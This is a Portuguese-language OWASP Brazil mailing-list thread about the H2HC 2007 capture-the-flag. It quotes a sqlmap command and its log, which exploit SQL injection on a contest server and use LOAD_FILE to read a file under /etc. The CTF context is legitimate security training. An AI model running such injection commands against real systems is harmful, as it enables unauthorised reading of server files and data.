[Owasp-brazil] Resultado Capture The Flag - H2HC 2007.

Wagner Elias wagner.elias at gmail.com
Wed Nov 14 06:45:33 EST 2007


Bom dia Bernardo...

Você poderia trocar idéias e falar um pouco como funciona o capítulo
Italiano?

Abs.
Wagner Elias 

-----Original Message-----
From: owasp-brazil-bounces at lists.owasp.org
[mailto:owasp-brazil-bounces at lists.owasp.org] On Behalf Of Bernardo Damele
Sent: quarta-feira, 14 de novembro de 2007 06:59
To: dum_dum at frontthescene.com.br; owasp-brazil at lists.owasp.org
Subject: Re: [Owasp-brazil] Resultado Capture The Flag - H2HC 2007.

Oi OWASP Brasil,

meu nome eh Bernardo, sou carioca mas moro na Italia a muitos anos.
Faco parte do OWASP Italy
(http://www.owasp.org/index.php/Italy#OWASP-Italy_Board) a mais ou menos um
ano e fico feliz em ver que tambem voces do OWASP Brasil estao se
organizando com atividades e encontros!

On Nov 14, 2007 2:09 AM,  <dum_dum at frontthescene.com.br> wrote:
> ...
> debian:/tmp/sqlmap# python
> sqlmap.py
--url="http://webdefenderh2hc.h2hc.org.br/ctf/show_noticia_popup.php?id=8"
>  --file="/etc/H2HCdesafioWebDefender.txt" -v1
>
>     sqlmap/0.5-rc3 coded by inquis <bernardo.damele at gmail.com>
>                     and belch <daniele.bellucci at gmail.com>
>
> [*] starting at: 12:07:05
>
> [12:07:06] [INFO] testing if the url is stable, wait a few seconds 
> [12:07:08] [INFO] url is stable [12:07:08] [INFO] testing if 'id' 
> parameter is dynamic [12:07:08] [INFO] confirming that 'id' parameter 
> is dynamic [12:07:08] [INFO] parameter 'id' is dynamic [12:07:08] 
> [INFO] testing sql injection on parameter 'id'
> [12:07:08] [INFO] testing numeric/unescaped injection on parameter 'id'
> [12:07:09] [INFO] parameter 'id' is not numeric/unescaped injectable 
> [12:07:09] [INFO] testing string/single quote injection on parameter 'id'
> [12:07:10] [INFO] confirming string/single quote injection on parameter
'id'
> [12:07:10] [INFO] parameter 'id' is string/single quote injectable 
> [12:07:10] [INFO] testing MySQL [12:07:10] [INFO] query: CONCAT('7', 
> '7') [12:07:10] [INFO] retrieved: 77 [12:07:17] [INFO] performed 20 
> queries in 6 seconds [12:07:17] [INFO] confirming MySQL [12:07:17] 
> [INFO] query: LENGTH('7') [12:07:17] [INFO] retrieved: 1 [12:07:20] 
> [INFO] performed 13 queries in 3 seconds [12:07:20] [INFO] query: 
> SELECT 7 FROM information_schema.TABLES LIMIT 0, 1 [12:07:20] [INFO] 
> retrieved: 7 [12:07:25] [INFO] performed 13 queries in 4 seconds
> remote DBMS:    MySQL >= 5.0.0
>
> [12:07:25] [INFO] fetching file: '/etc/H2HCdesafioWebDefender.txt'
> [12:07:25] [INFO] query: LOAD_FILE('/etc/H2HCdesafioWebDefender.txt')
> [12:07:25] [INFO] retrieved:
> ...

Que legal ver que voces utilizarom meu programa sqlmap como dimostracao aqui
;-)

--
Bernardo Damele

Email address: bernardo.damele (at) gmail.com Mobile number: +39 3493821385
_______________________________________________
Owasp-brazil mailing list
Owasp-brazil at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-brazil



More information about the Owasp-brazil mailing list